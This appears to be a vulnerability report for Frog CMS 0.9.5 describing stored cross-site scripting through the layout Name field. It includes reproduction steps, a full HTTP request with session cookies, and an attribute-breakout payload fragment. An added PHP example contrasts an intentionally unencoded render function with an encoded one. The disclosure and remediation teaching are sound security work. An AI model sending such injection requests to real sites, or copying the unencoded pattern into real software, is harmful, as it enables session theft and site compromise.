Frog CMS simplifies content management by offering an elegant user interface, flexible templating per page, simple user management and permissions, as well as the tools necessary for file management.
GNU General Public License v3.0
Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability #8
I have found a stored Cross Site Scripting Vulnerability.
Log into the system with an administrator role: http://127.0.0.1/test/FrogCMS-master/admin/
Publish an article, and you can click it.
Layouts --> Edit layout --> Name
payload:"/>
exp:

POST /test/FrogCMS-master/admin/?/layout/edit/1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/FrogCMS-master/admin/?/layout/edit/1
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
Cookie: current_tab=:tab-1; expanded_rows=4; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e
Connection: keep-alive
Upgrade-Insecure-Requests: 1

layout%5Bname%5D="/>
Affected Version: 0.9.5
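
The report's payload begins with `"/>`, which closes the `value` attribute and the `<input>` tag that holds the stored layout name. The following is an added example, not code from Frog CMS or from the report: it places the unencoded rendering pattern beside an attribute-encoded one and uses PHP's DOM parser to check how many elements each produces. The function names and the sample string are hypothetical and constructed for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers (not Frog CMS code): render the layout "Name" field
// of an edit form from a value that was previously stored in the database.

// Vulnerable pattern: the stored value is concatenated into the attribute as-is.
function render_name_input_unsafe(string $name): string
{
    return '<input type="text" name="layout[name]" value="' . $name . '" />';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES covers both quote styles, so the value cannot end the attribute.
function render_name_input_safe(string $name): string
{
    $encoded = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="layout[name]" value="' . $encoded . '" />';
}

// Count the elements the HTML parser creates inside <body> for a fragment.
// A correctly encoded field must yield exactly one element: the <input>.
function count_body_elements(string $fragment): int
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $fragment . '</body></html>');
    libxml_clear_errors();
    $body = $doc->getElementsByTagName('body')->item(0);
    return $body->getElementsByTagName('*')->length;
}

// Constructed sample: the same '"/>' prefix as the report, then an inert tag.
$stored = '"/><b>injected</b>';

$renderers = [
    'unsafe' => 'render_name_input_unsafe',
    'safe'   => 'render_name_input_safe',
];

foreach ($renderers as $label => $fn) {
    $html = $fn($stored);
    printf("%-6s elements=%d  %s\n", $label, count_body_elements($html), $html);
}
```

Because the value is stored, the encoding has to be applied on every page that prints the layout name, not only on the edit form.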